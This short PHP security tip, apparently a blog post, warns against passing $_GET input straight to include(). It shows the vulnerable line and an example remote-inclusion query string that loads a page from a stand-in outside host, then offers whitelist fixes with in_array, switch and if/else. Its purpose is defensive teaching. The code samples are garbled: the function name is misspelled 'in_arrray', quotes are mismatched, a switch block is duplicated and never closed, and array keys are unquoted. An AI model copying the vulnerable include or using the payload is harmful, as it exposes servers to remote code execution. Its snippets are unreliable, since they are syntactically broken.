It is very important to check your data that you take with $_GET before use.
You can use $_Get in some cases , in each case there are some different measures to be taken.
For example if you use sth like that
if(isset($_GET[ex]))
include($_GET[ex]);
If you use this codes, bad users can include any page that they want in your web page
?ex=http://www.example.com/bad_page.php
With this they can include any page that they want.
$operation =array(‘add’,'delete’,'edit’,’save’);
if (in_arrray($_GET[ex],$operation))
.. make sth…
Also you can use switch,or if..
switch($_GET[ex]){
case ‘add’: something…
break;
case ‘delete’: something…
break;
default: something…
case ‘add’: something…
break;
case ‘delete’: something…
break;
default: something…
with if
if($_GET[ex] == "add"){
Do something..
}
else if($_GET[ex] =="delete"){
Do something..
}
else
die("possible hack attempt");
Recent Comments